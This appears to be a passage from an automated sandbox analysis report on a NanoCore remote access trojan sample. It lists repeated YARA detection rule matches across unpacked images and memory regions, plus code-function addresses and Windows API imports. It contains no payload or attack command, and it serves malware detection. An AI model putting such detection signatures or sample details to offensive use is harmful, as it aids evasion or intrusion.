        Source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327568976.000000000282E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.314285351.00000000028DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_004030FB
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004047D30_2_004047D3
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004061D40_2_004061D4
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF85BEF0_2_6FF85BEF
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF85BE00_2_6FF85BE0
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 1_1_0040A2A51_1_0040A2A5
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_004047D38_2_004047D3
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_004061D48_2_004061D4
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF85BEF8_2_6FF85BEF
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF85BE08_2_6FF85BE0
